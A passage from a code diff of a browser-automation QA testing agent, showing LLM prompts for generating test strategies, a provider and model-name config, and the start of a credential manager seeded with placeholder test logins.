|
| 263 |
+
Please provide a JSON response with:
|
| 264 |
+
1. approach: The overall testing approach (comprehensive, focused, security-focused, etc.)
|
| 265 |
+
2. priority_order: List of testing priorities in order
|
| 266 |
+
3. focus_areas: Specific areas to focus testing on
|
| 267 |
+
4. risk_assessment: Risk levels for different areas (high, medium, low)
|
| 268 |
+
5. estimated_duration: Estimated testing duration in minutes
|
| 269 |
+
6. reasoning: Explanation of the strategy
|
| 270 |
+
|
| 271 |
+
Focus on:
|
| 272 |
+
- Form validation testing (valid, invalid, edge cases)
|
| 273 |
+
- Security testing (SQL injection, XSS, CSRF)
|
| 274 |
+
- User experience testing
|
| 275 |
+
- Cross-browser compatibility
|
| 276 |
+
- Performance testing
|
| 277 |
+
"""
|
| 278 |
+
|
| 279 |
+
try:
|
| 280 |
+
messages = [
|
| 281 |
+
SystemMessage(content="You are an expert QA engineer specializing in web application testing. Provide detailed, actionable testing strategies."),
|
| 282 |
+
HumanMessage(content=strategy_prompt)
|
| 283 |
+
]
|
| 284 |
+
|
| 285 |
+
response = await self.llm.ainvoke(messages)
|
| 286 |
+
strategy_data = json.loads(response.content)
|
| 287 |
+
|
| 288 |
+
strategy = TestStrategy(
|
| 289 |
+
approach=strategy_data.get("approach", "comprehensive"),
|
| 290 |
+
priority_order=strategy_data.get("priority_order", []),
|
| 291 |
+
focus_areas=strategy_data.get("focus_areas", []),
|
| 292 |
+
risk_assessment=strategy_data.get("risk_assessment", {}),
|
| 293 |
+
estimated_duration=strategy_data.get("estimated_duration", 30),
|
| 294 |
+
reasoning=strategy_data.get("reasoning", "AI-generated strategy")
|
| 295 |
+
)
|
| 296 |
+
|
| 297 |
+
logger.info(f"✅ Testing strategy generated: {strategy.approach} approach")
|
| 298 |
+
return strategy
|
| 299 |
+
|
| 300 |
+
except Exception as e:
|
| 301 |
+
logger.error(f"Error generating testing strategy: {e}")
|
| 302 |
+
# Fallback strategy
|
| 303 |
+
return TestStrategy(
|
| 304 |
+
approach="comprehensive",
|
| 305 |
+
priority_order=["form_validation", "security_testing", "user_experience"],
|
| 306 |
+
focus_areas=["input_validation", "authentication", "data_integrity"],
|
| 307 |
+
risk_assessment={"security": 0.8, "validation": 0.6, "ux": 0.4},
|
| 308 |
+
estimated_duration=30,
|
| 309 |
+
reasoning="Fallback strategy due to AI error"
|
| 310 |
+
)
|
| 311 |
+
|
| 312 |
+
async def think_through_scenario(self, scenario: str, context: Dict[str, Any]) -> List[ThinkingStep]:
|
| 313 |
+
"""Think through a specific testing scenario step by step."""
|
| 314 |
+
logger.info(f"🤔 Thinking through scenario: {scenario}")
|
| 315 |
+
|
| 316 |
+
thinking_prompt = f"""
|
| 317 |
+
As an expert QA engineer, think through this testing scenario step by step:
|
| 318 |
+
|
| 319 |
+
Scenario: {scenario}
|
| 320 |
+
Context: {json.dumps(context, indent=2)}
|
| 321 |
+
|
| 322 |
+
Provide your thinking process as a JSON array of steps, where each step has:
|
| 323 |
+
- step_number: Sequential number
|
| 324 |
+
- thought: What you're thinking about
|
| 325 |
+
- action: What action you would take
|
| 326 |
+
- reasoning: Why you would take this action
|
| 327 |
+
- confidence: Confidence level (0.0 to 1.0)
|
| 328 |
+
|
| 329 |
+
Consider:
|
| 330 |
+
1. What could go wrong?
|
| 331 |
+
2. What edge cases should be tested?
|
| 332 |
+
3. What security implications exist?
|
| 333 |
+
4. How can we ensure comprehensive coverage?
|
| 334 |
+
5. What are the user experience implications?
|
| 335 |
+
"""
|
| 336 |
+
|
| 337 |
+
try:
|
| 338 |
+
messages = [
|
| 339 |
+
SystemMessage(content="You are an expert QA engineer. Think through testing scenarios systematically and provide detailed reasoning."),
|
| 340 |
+
HumanMessage(content=thinking_prompt)
|
| 341 |
+
]
|
| 342 |
+
|
| 343 |
+
response = await self.llm.ainvoke(messages)
|
| 344 |
+
thinking_data = json.loads(response.content)
|
| 345 |
+
|
| 346 |
+
thinking_steps = []
|
| 347 |
+
for i, step_data in enumerate(thinking_data, 1):
|
| 348 |
+
step = ThinkingStep(
|
| 349 |
+
step_number=i,
|
| 350 |
+
thought=step_data.get("thought", ""),
|
| 351 |
+
action=step_data.get("action", ""),
|
| 352 |
+
reasoning=step_data.get("reasoning", ""),
|
| 353 |
+
confidence=step_data.get("confidence", 0.5),
|
| 354 |
+
timestamp=datetime.now()
|
| 355 |
+
)
|
| 356 |
+
thinking_steps.append(step)
|
| 357 |
+
|
| 358 |
+
self.thinking_history.extend(thinking_steps)
|
| 359 |
+
logger.info(f"✅ Generated {len(thinking_steps)} thinking steps")
|
| 360 |
+
return thinking_steps
|
| 361 |
+
|
| 362 |
+
except Exception as e:
|
| 363 |
+
logger.error(f"Error thinking through scenario: {e}")
|
| 364 |
+
return []
|
| 365 |
+
|
| 366 |
+
async def adapt_testing_approach(self, previous_results: List[Dict[str, Any]]) -> Dict[str, Any]:
|
| 367 |
+
"""Adapt the testing approach based on previous results."""
|
| 368 |
+
logger.info("🔄 Adapting testing approach based on previous results...")
|
| 369 |
+
|
| 370 |
+
if not previous_results:
|
| 371 |
+
return {"adaptation": "no_previous_data", "recommendations": []}
|
| 372 |
+
|
| 373 |
+
# Analyze failure patterns
|
| 374 |
+
failures = [r for r in previous_results if not r.get("success", True)]
|
| 375 |
+
success_rate = (len(previous_results) - len(failures)) / len(previous_results)
|
| 376 |
+
|
| 377 |
+
adaptations = {
|
| 378 |
+
"success_rate": success_rate,
|
| 379 |
+
"adaptations": [],
|
| 380 |
+
"recommendations": []
|
| 381 |
+
}
|
| 382 |
+
|
| 383 |
+
if success_rate < 0.5:
|
| 384 |
+
adaptations["adaptations"].append("increase_test_coverage")
|
| 385 |
+
adaptations["recommendations"].append("Focus on high-priority test cases first")
|
| 386 |
+
|
| 387 |
+
# Analyze specific failure types
|
| 388 |
+
validation_failures = [r for r in failures if "validation" in r.get("scenario_name", "").lower()]
|
| 389 |
+
if validation_failures:
|
| 390 |
+
adaptations["adaptations"].append("enhance_validation_testing")
|
| 391 |
+
adaptations["recommendations"].append("Implement more robust validation testing")
|
| 392 |
+
|
| 393 |
+
security_failures = [r for r in failures if any(x in r.get("scenario_name", "").lower() for x in ["sql", "xss", "injection"])]
|
| 394 |
+
if security_failures:
|
| 395 |
+
adaptations["adaptations"].append("strengthen_security_testing")
|
| 396 |
+
adaptations["recommendations"].append("Focus on security vulnerability testing")
|
| 397 |
+
|
| 398 |
+
logger.info(f"✅ Testing approach adapted: {len(adaptations['adaptations'])} adaptations")
|
| 399 |
+
return adaptations
|
| 400 |
+
|
| 401 |
+
async def learn_from_results(self, test_results: List[Dict[str, Any]]) -> None:
|
| 402 |
+
"""Learn from test results to improve future testing."""
|
| 403 |
+
logger.info("📚 Learning from test results...")
|
| 404 |
+
|
| 405 |
+
for result in test_results:
|
| 406 |
+
scenario_type = result.get("scenario_name", "").split(" - ")[0]
|
| 407 |
+
|
| 408 |
+
if scenario_type not in self.learning_patterns:
|
| 409 |
+
self.learning_patterns[scenario_type] = []
|
| 410 |
+
|
| 411 |
+
self.learning_patterns[scenario_type].append({
|
| 412 |
+
"success": result.get("success", False),
|
| 413 |
+
"actual_result": result.get("actual_result", ""),
|
| 414 |
+
"timestamp": datetime.now().isoformat()
|
| 415 |
+
})
|
| 416 |
+
|
| 417 |
+
# Update context memory with learned patterns
|
| 418 |
+
self.context_memory["learning_patterns"] = self.learning_patterns
|
| 419 |
+
self.context_memory["last_learning_update"] = datetime.now().isoformat()
|
| 420 |
+
|
| 421 |
+
logger.info(f"✅ Learned from {len(test_results)} test results")
|
| 422 |
+
|
| 423 |
+
def get_thinking_summary(self) -> Dict[str, Any]:
|
| 424 |
+
"""Get a summary of the AI thinking process."""
|
| 425 |
+
if not self.thinking_history:
|
| 426 |
+
return {"message": "No thinking history available"}
|
| 427 |
+
|
| 428 |
+
total_steps = len(self.thinking_history)
|
| 429 |
+
avg_confidence = sum(step.confidence for step in self.thinking_history) / total_steps
|
| 430 |
+
|
| 431 |
+
return {
|
| 432 |
+
"total_thinking_steps": total_steps,
|
| 433 |
+
"average_confidence": round(avg_confidence, 2),
|
| 434 |
+
"thinking_areas": list(set(step.action.split()[0] for step in self.thinking_history if step.action)),
|
| 435 |
+
"learning_patterns": len(self.learning_patterns),
|
| 436 |
+
"context_memory_size": len(self.context_memory)
|
| 437 |
+
}
|
src/utils/config.py
ADDED
|
@@ -0,0 +1,111 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Configuration
|
| 3 |
+
=========================================================
|
| 4 |
+
|
| 5 |
+
Configuration settings and constants for the Fagun Browser Automation Testing Agent.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
PROVIDER_DISPLAY_NAMES = {
|
| 13 |
+
"openai": "OpenAI",
|
| 14 |
+
"azure_openai": "Azure OpenAI",
|
| 15 |
+
"anthropic": "Anthropic",
|
| 16 |
+
"deepseek": "DeepSeek",
|
| 17 |
+
"google": "Google",
|
| 18 |
+
"alibaba": "Alibaba",
|
| 19 |
+
"moonshot": "MoonShot",
|
| 20 |
+
"unbound": "Unbound AI",
|
| 21 |
+
"ibm": "IBM",
|
| 22 |
+
"grok": "Grok",
|
| 23 |
+
}
|
| 24 |
+
|
| 25 |
+
# Predefined model names for common providers
|
| 26 |
+
model_names = {
|
| 27 |
+
"anthropic": ["claude-3-5-sonnet-20241022", "claude-3-5-sonnet-20240620", "claude-3-opus-20240229"],
|
| 28 |
+
"openai": ["gpt-4o", "gpt-4", "gpt-3.5-turbo", "o3-mini"],
|
| 29 |
+
"deepseek": ["deepseek-chat", "deepseek-reasoner"],
|
| 30 |
+
"google": ["gemini-2.0-flash", "gemini-2.0-flash-thinking-exp", "gemini-1.5-flash-latest",
|
| 31 |
+
"gemini-1.5-flash-8b-latest", "gemini-2.0-flash-thinking-exp-01-21", "gemini-2.0-pro-exp-02-05",
|
| 32 |
+
"gemini-2.5-pro-preview-03-25", "gemini-2.5-flash-preview-04-17"],
|
| 33 |
+
"ollama": ["qwen2.5:7b", "qwen2.5:14b", "qwen2.5:32b", "qwen2.5-coder:14b", "qwen2.5-coder:32b", "llama2:7b",
|
| 34 |
+
"deepseek-r1:14b", "deepseek-r1:32b"],
|
| 35 |
+
"azure_openai": ["gpt-4o", "gpt-4", "gpt-3.5-turbo"],
|
| 36 |
+
"mistral": ["pixtral-large-latest", "mistral-large-latest", "mistral-small-latest", "ministral-8b-latest"],
|
| 37 |
+
"alibaba": ["qwen-plus", "qwen-max", "qwen-vl-max", "qwen-vl-plus", "qwen-turbo", "qwen-long"],
|
| 38 |
+
"moonshot": ["moonshot-v1-32k-vision-preview", "moonshot-v1-8k-vision-preview"],
|
| 39 |
+
"unbound": ["gemini-2.0-flash", "gpt-4o-mini", "gpt-4o", "gpt-4.5-preview"],
|
| 40 |
+
"grok": [
|
| 41 |
+
"grok-3",
|
| 42 |
+
"grok-3-fast",
|
| 43 |
+
"grok-3-mini",
|
| 44 |
+
"grok-3-mini-fast",
|
| 45 |
+
"grok-2-vision",
|
| 46 |
+
"grok-2-image",
|
| 47 |
+
"grok-2",
|
| 48 |
+
],
|
| 49 |
+
"siliconflow": [
|
| 50 |
+
"deepseek-ai/DeepSeek-R1",
|
| 51 |
+
"deepseek-ai/DeepSeek-V3",
|
| 52 |
+
"deepseek-ai/DeepSeek-R1-Distill-Qwen-32B",
|
| 53 |
+
"deepseek-ai/DeepSeek-R1-Distill-Qwen-14B",
|
| 54 |
+
"deepseek-ai/DeepSeek-R1-Distill-Qwen-7B",
|
| 55 |
+
"deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B",
|
| 56 |
+
"deepseek-ai/DeepSeek-V2.5",
|
| 57 |
+
"deepseek-ai/deepseek-vl2",
|
| 58 |
+
"Qwen/Qwen2.5-72B-Instruct-128K",
|
| 59 |
+
"Qwen/Qwen2.5-72B-Instruct",
|
| 60 |
+
"Qwen/Qwen2.5-32B-Instruct",
|
| 61 |
+
"Qwen/Qwen2.5-14B-Instruct",
|
| 62 |
+
"Qwen/Qwen2.5-7B-Instruct",
|
| 63 |
+
"Qwen/Qwen2.5-Coder-32B-Instruct",
|
| 64 |
+
"Qwen/Qwen2.5-Coder-7B-Instruct",
|
| 65 |
+
"Qwen/Qwen2-7B-Instruct",
|
| 66 |
+
"Qwen/Qwen2-1.5B-Instruct",
|
| 67 |
+
"Qwen/QwQ-32B-Preview",
|
| 68 |
+
"Qwen/Qwen2-VL-72B-Instruct",
|
| 69 |
+
"Qwen/Qwen2.5-VL-32B-Instruct",
|
| 70 |
+
"Qwen/Qwen2.5-VL-72B-Instruct",
|
| 71 |
+
"TeleAI/TeleChat2",
|
| 72 |
+
"THUDM/glm-4-9b-chat",
|
| 73 |
+
"Vendor-A/Qwen/Qwen2.5-72B-Instruct",
|
| 74 |
+
"internlm/internlm2_5-7b-chat",
|
| 75 |
+
"internlm/internlm2_5-20b-chat",
|
| 76 |
+
"Pro/Qwen/Qwen2.5-7B-Instruct",
|
| 77 |
+
"Pro/Qwen/Qwen2-7B-Instruct",
|
| 78 |
+
"Pro/Qwen/Qwen2-1.5B-Instruct",
|
| 79 |
+
"Pro/THUDM/chatglm3-6b",
|
| 80 |
+
"Pro/THUDM/glm-4-9b-chat",
|
| 81 |
+
],
|
| 82 |
+
"ibm": ["ibm/granite-vision-3.1-2b-preview", "meta-llama/llama-4-maverick-17b-128e-instruct-fp8",
|
| 83 |
+
"meta-llama/llama-3-2-90b-vision-instruct"],
|
| 84 |
+
"modelscope":[
|
| 85 |
+
"Qwen/Qwen2.5-Coder-32B-Instruct",
|
| 86 |
+
"Qwen/Qwen2.5-Coder-14B-Instruct",
|
| 87 |
+
"Qwen/Qwen2.5-Coder-7B-Instruct",
|
| 88 |
+
"Qwen/Qwen2.5-72B-Instruct",
|
| 89 |
+
"Qwen/Qwen2.5-32B-Instruct",
|
| 90 |
+
"Qwen/Qwen2.5-14B-Instruct",
|
| 91 |
+
"Qwen/Qwen2.5-7B-Instruct",
|
| 92 |
+
"Qwen/QwQ-32B-Preview",
|
| 93 |
+
"Qwen/Qwen2.5-VL-3B-Instruct",
|
| 94 |
+
"Qwen/Qwen2.5-VL-7B-Instruct",
|
| 95 |
+
"Qwen/Qwen2.5-VL-32B-Instruct",
|
| 96 |
+
"Qwen/Qwen2.5-VL-72B-Instruct",
|
| 97 |
+
"deepseek-ai/DeepSeek-R1-Distill-Qwen-32B",
|
| 98 |
+
"deepseek-ai/DeepSeek-R1-Distill-Qwen-14B",
|
| 99 |
+
"deepseek-ai/DeepSeek-R1-Distill-Qwen-7B",
|
| 100 |
+
"deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B",
|
| 101 |
+
"deepseek-ai/DeepSeek-R1",
|
| 102 |
+
"deepseek-ai/DeepSeek-V3",
|
| 103 |
+
"Qwen/Qwen3-1.7B",
|
| 104 |
+
"Qwen/Qwen3-4B",
|
| 105 |
+
"Qwen/Qwen3-8B",
|
| 106 |
+
"Qwen/Qwen3-14B",
|
| 107 |
+
"Qwen/Qwen3-30B-A3B",
|
| 108 |
+
"Qwen/Qwen3-32B",
|
| 109 |
+
"Qwen/Qwen3-235B-A22B",
|
| 110 |
+
],
|
| 111 |
+
}
|
src/utils/credential_manager.py
ADDED
|
@@ -0,0 +1,628 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Credential Manager
|
| 3 |
+
==============================================================
|
| 4 |
+
|
| 5 |
+
Secure credential management and testing system.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import logging
|
| 14 |
+
import json
|
| 15 |
+
import hashlib
|
| 16 |
+
import base64
|
| 17 |
+
from typing import Dict, List, Optional, Any, Tuple
|
| 18 |
+
from dataclasses import dataclass
|
| 19 |
+
from datetime import datetime
|
| 20 |
+
import random
|
| 21 |
+
import string
|
| 22 |
+
|
| 23 |
+
from playwright.async_api import Page, Locator
|
| 24 |
+
|
| 25 |
+
logger = logging.getLogger(__name__)
|
| 26 |
+
|
| 27 |
+
@dataclass
|
| 28 |
+
class CredentialSet:
|
| 29 |
+
"""Represents a set of credentials for testing."""
|
| 30 |
+
name: str
|
| 31 |
+
email: str
|
| 32 |
+
password: str
|
| 33 |
+
description: str
|
| 34 |
+
is_valid: bool
|
| 35 |
+
category: str # valid, invalid, edge_case, security_test
|
| 36 |
+
created_at: datetime
|
| 37 |
+
|
| 38 |
+
@dataclass
|
| 39 |
+
class CredentialTestResult:
|
| 40 |
+
"""Result of testing with specific credentials."""
|
| 41 |
+
credential_set: CredentialSet
|
| 42 |
+
success: bool
|
| 43 |
+
response_type: str # success, validation_error, security_error, etc.
|
| 44 |
+
error_message: Optional[str] = None
|
| 45 |
+
screenshot_path: Optional[str] = None
|
| 46 |
+
timestamp: datetime = None
|
| 47 |
+
|
| 48 |
+
class CredentialManager:
|
| 49 |
+
"""Advanced credential management and testing system."""
|
| 50 |
+
|
| 51 |
+
def __init__(self, page: Page):
|
| 52 |
+
self.page = page
|
| 53 |
+
self.credential_sets: List[CredentialSet] = []
|
| 54 |
+
self.test_results: List[CredentialTestResult] = []
|
| 55 |
+
self.encryption_key = self._generate_encryption_key()
|
| 56 |
+
|
| 57 |
+
# Initialize with default credential sets
|
| 58 |
+
self._initialize_default_credentials()
|
| 59 |
+
|
| 60 |
+
def _generate_encryption_key(self) -> str:
|
| 61 |
+
"""Generate a simple encryption key for credential storage."""
|
| 62 |
+
return hashlib.sha256(f"fagun_credential_key_{datetime.now().isoformat()}".encode()).hexdigest()[:32]
|
| 63 |
+
|
| 64 |
+
def _initialize_default_credentials(self):
|
| 65 |
+
"""Initialize with default credential sets for testing."""
|
| 66 |
+
default_credentials = [
|
| 67 |
+
# Valid credentials
|
| 68 |
+
CredentialSet(
|
| 69 |
+
name="Valid User 1",
|
| 70 |
+
email="testuser1@example.com",
|
| 71 |
+
password="ValidPass123!",
|
| 72 |
+
description="Standard valid credentials",
|
| 73 |
+
is_valid=True,
|
| 74 |
+
category="valid",
|
| 75 |
+
created_at=datetime.now()
|
| 76 |
+
),
|
| 77 |
+
CredentialSet(
|
| 78 |
+
name="Valid User 2",
|
| 79 |
+
email="admin@testdomain.org",
|
| 80 |
+
password="AdminPass456@",
|
| 81 |
+
description="Admin valid credentials",
|
| 82 |
+
is_valid=True,
|
| 83 |
+
category="valid",
|
| 84 |
+
created_at=datetime.now()
|
| 85 |
+
),
|
| 86 |
+
|
| 87 |
+
# Invalid credentials
|
| 88 |
+
CredentialSet(
|
| 89 |
+
name="Invalid Email",
|
| 90 |
+
email="invalid-email-format",
|
| 91 |
+
password="ValidPass123!",
|
| 92 |
+
description="Invalid email format",
|
| 93 |
+
is_valid=False,
|
| 94 |
+
category="invalid",
|
| 95 |
+
created_at=datetime.now()
|
| 96 |
+
),
|
| 97 |
+
CredentialSet(
|
| 98 |
+
name="Invalid Password",
|
| 99 |
+
email="test@example.com",
|
| 100 |
+
password="weak",
|
| 101 |
+
description="Weak password",
|
| 102 |
+
is_valid=False,
|
| 103 |
+
category="invalid",
|
| 104 |
+
created_at=datetime.now()
|
| 105 |
+
),
|
| 106 |
+
CredentialSet(
|
| 107 |
+
name="Empty Credentials",
|
| 108 |
+
email="",
|
| 109 |
+
password="",
|
| 110 |
+
description="Empty email and password",
|
| 111 |
+
is_valid=False,
|
| 112 |
+
category="invalid",
|
| 113 |
+
created_at=datetime.now()
|
| 114 |
+
),
|
| 115 |
+
|
| 116 |
+
# Edge case credentials
|
| 117 |
+
CredentialSet(
|
| 118 |
+
name="Special Characters",
|
| 119 |
+
email="test+special@example.com",
|
| 120 |
+
password="Pass@123!@#$%",
|
| 121 |
+
description="Credentials with special characters",
|
| 122 |
+
is_valid=True,
|
| 123 |
+
category="edge_case",
|
| 124 |
+
created_at=datetime.now()
|
| 125 |
+
),
|
| 126 |
+
CredentialSet(
|
| 127 |
+
name="Long Email",
|
| 128 |
+
email="very.long.email.address.for.testing.purposes@verylongdomainname.com",
|
| 129 |
+
password="ValidPass123!",
|
| 130 |
+
description="Very long email address",
|
| 131 |
+
is_valid=True,
|
| 132 |
+
category="edge_case",
|
| 133 |
+
created_at=datetime.now()
|
| 134 |
+
),
|
| 135 |
+
CredentialSet(
|
| 136 |
+
name="Unicode Email",
|
| 137 |
+
email="测试@example.com",
|
| 138 |
+
password="ValidPass123!",
|
| 139 |
+
description="Email with Unicode characters",
|
| 140 |
+
is_valid=True,
|
| 141 |
+
category="edge_case",
|
| 142 |
+
